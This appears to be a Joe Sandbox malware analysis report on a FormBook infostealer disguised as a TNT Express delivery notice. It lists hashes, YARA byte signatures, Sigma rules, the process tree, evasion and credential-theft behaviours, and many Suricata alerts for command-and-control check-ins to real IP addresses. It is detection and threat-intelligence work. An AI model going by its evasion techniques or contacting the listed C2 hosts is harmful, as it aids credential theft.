Edit tour

Windows Analysis Report
TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Overview

General Information

Sample name:	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
Analysis ID:	1488540
MD5:	430eabd3f3bc703cd6d9a25a815258cf
SHA1:	9e4a589ba42030204939212d924bd365a6233a60
SHA256:	16c27de38c93b69fdf3a9b9998f819358db3e34d74cbd7c7b4c5d5abf373de28
Tags:	exeTNT
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe" MD5: 430EABD3F3BC703CD6D9A25A815258CF)

svchost.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

hoCcQGubWgo.exe (PID: 1108 cmdline: "C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

getmac.exe (PID: 7672 cmdline: "C:\Windows\SysWOW64\getmac.exe" MD5: 31874C37626D02373768F72A64E76214)

hoCcQGubWgo.exe (PID: 6440 cmdline: "C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7968 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4c1bf:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3439e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a122b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28940a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f3d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x175b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a122b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28940a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e5d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x167b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f3d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x175b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", CommandLine: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", CommandLine|base64offset|contains: kz, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", ParentImage: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, ParentProcessId: 7512, ParentProcessName: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", ProcessId: 7572, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", CommandLine: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", CommandLine|base64offset|contains: kz, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", ParentImage: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, ParentProcessId: 7512, ParentProcessName: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe", ProcessId: 7572, ProcessName: svchost.exe

Snort Signatures

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 68.183.37.14

Timestamp:	2024-08-06T07:59:39.942293+0200
SID:	2855464
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 154.23.184.207

Timestamp:	2024-08-06T07:57:59.609915+0200
SID:	2855465
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 203.161.46.201

Timestamp:	2024-08-06T07:58:50.116791+0200
SID:	2855464
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 176.57.64.102

Timestamp:	2024-08-06T07:57:10.827378+0200
SID:	2855464
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 203.161.46.201

Timestamp:	2024-08-06T07:58:52.643005+0200
SID:	2855464
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 178.63.50.103

Timestamp:	2024-08-06T07:59:53.509352+0200
SID:	2855464
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 45.33.30.197

Timestamp:	2024-08-06T07:57:27.029504+0200
SID:	2855464
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 194.195.220.41

Timestamp:	2024-08-06T07:58:12.930171+0200
SID:	2855465
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 103.42.108.46

Timestamp:	2024-08-06T07:58:35.113758+0200
SID:	2855464
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 194.195.220.41

Timestamp:	2024-08-06T07:58:07.843193+0200
SID:	2855464
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 45.33.30.197

Timestamp:	2024-08-06T07:57:29.613621+0200
SID:	2855464
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 64.64.253.144

Timestamp:	2024-08-06T08:00:05.093330+0200
SID:	2855464
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 68.183.37.14

Timestamp:	2024-08-06T07:59:45.033668+0200
SID:	2855465
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 104.21.17.191

Timestamp:	2024-08-06T08:00:23.513672+0200
SID:	2855464
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 198.54.126.42

Timestamp:	2024-08-06T07:59:29.214920+0200
SID:	2855464
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 64.64.253.144

Timestamp:	2024-08-06T08:00:07.612102+0200
SID:	2855464
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 198.54.126.42

Timestamp:	2024-08-06T07:59:24.118869+0200
SID:	2855464
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 64.64.253.144

Timestamp:	2024-08-06T08:00:10.153366+0200
SID:	2855464
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 194.195.220.41

Timestamp:	2024-08-06T07:58:10.399460+0200
SID:	2855464
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 45.76.85.183

Timestamp:	2024-08-06T07:59:06.504244+0200
SID:	2855464
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 104.21.17.191

Timestamp:	2024-08-06T08:00:18.404727+0200
SID:	2855464
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 13.248.169.48

Timestamp:	2024-08-06T07:58:23.677598+0200
SID:	2855464
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 203.161.46.201

Timestamp:	2024-08-06T07:58:55.194048+0200
SID:	2855465
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 68.183.37.14

Timestamp:	2024-08-06T07:59:43.074646+0200
SID:	2855464
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 154.23.184.207

Timestamp:	2024-08-06T07:57:54.505824+0200
SID:	2855464
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 104.21.17.191

Timestamp:	2024-08-06T08:00:20.964440+0200
SID:	2855464
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 178.63.50.103

Timestamp:	2024-08-06T07:59:58.615177+0200
SID:	2855465
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 141.94.102.188

Timestamp:	2024-08-06T07:57:45.939722+0200
SID:	2855465
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 45.76.85.183

Timestamp:	2024-08-06T07:59:03.948130+0200
SID:	2855464
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 154.23.184.207

Timestamp:	2024-08-06T07:57:51.953300+0200
SID:	2855464
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 141.94.102.188

Timestamp:	2024-08-06T07:57:38.370909+0200
SID:	2855464
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 13.248.169.48

Timestamp:	2024-08-06T07:58:21.301226+0200
SID:	2855464
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 13.248.169.48

Timestamp:	2024-08-06T07:58:26.233722+0200
SID:	2855465
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 203.161.46.201

Timestamp:	2024-08-06T07:58:47.559889+0200
SID:	2855464
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 176.57.64.102

Timestamp:	2024-08-06T07:57:13.439571+0200
SID:	2855464
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 178.63.50.103

Timestamp:	2024-08-06T07:59:50.994732+0200
SID:	2855464
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 176.57.64.102

Timestamp:	2024-08-06T07:57:15.964861+0200
SID:	2855464
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 45.33.30.197

Timestamp:	2024-08-06T07:57:24.473740+0200
SID:	2855464
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 68.183.37.14

Timestamp:	2024-08-06T07:59:37.400183+0200
SID:	2855464
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 64.64.253.144

Timestamp:	2024-08-06T08:00:12.699416+0200
SID:	2855465
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 85.159.66.93

Timestamp:	2024-08-06T07:56:55.011639+0200
SID:	2855465
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 45.76.85.183

Timestamp:	2024-08-06T07:59:01.399765+0200
SID:	2855464
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 104.21.17.191

Timestamp:	2024-08-06T08:00:26.044337+0200
SID:	2855465
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 103.42.108.46

Timestamp:	2024-08-06T07:58:37.683326+0200
SID:	2855464
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 198.54.126.42

Timestamp:	2024-08-06T07:59:26.650839+0200
SID:	2855464
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 178.63.50.103

Timestamp:	2024-08-06T07:59:56.055489+0200
SID:	2855464
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 13.248.169.48

Timestamp:	2024-08-06T07:58:18.605687+0200
SID:	2855464
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 45.33.30.197

Timestamp:	2024-08-06T07:57:32.128549+0200
SID:	2855465
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 45.76.85.183

Timestamp:	2024-08-06T07:59:09.041699+0200
SID:	2855465
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 141.94.102.188

Timestamp:	2024-08-06T07:57:41.067635+0200
SID:	2855464
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 141.94.102.188

Timestamp:	2024-08-06T07:57:43.991574+0200
SID:	2855464
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 103.42.108.46

Timestamp:	2024-08-06T07:58:40.330268+0200
SID:	2855465
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 154.23.184.207

Timestamp:	2024-08-06T07:57:57.087564+0200
SID:	2855464
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 198.54.126.42

Timestamp:	2024-08-06T07:59:31.757828+0200
SID:	2855465
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 103.42.108.46

Timestamp:	2024-08-06T07:58:32.568645+0200
SID:	2855464
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 176.57.64.102

Timestamp:	2024-08-06T07:57:18.625323+0200
SID:	2855465
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.7 - Destination IP: 194.195.220.41

Timestamp:	2024-08-06T07:58:05.283975+0200
SID:	2855464
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	ReversingLabs: Detection: 70%
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Virustotal: Detection: 37%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Joe Sandbox ML: detected

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hoCcQGubWgo.exe, 00000003.00000000.1474512552.0000000000B3E000.00000002.00000001.01000000.00000004.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3820695813.0000000000B3E000.00000002.00000001.01000000.00000004.sdmp
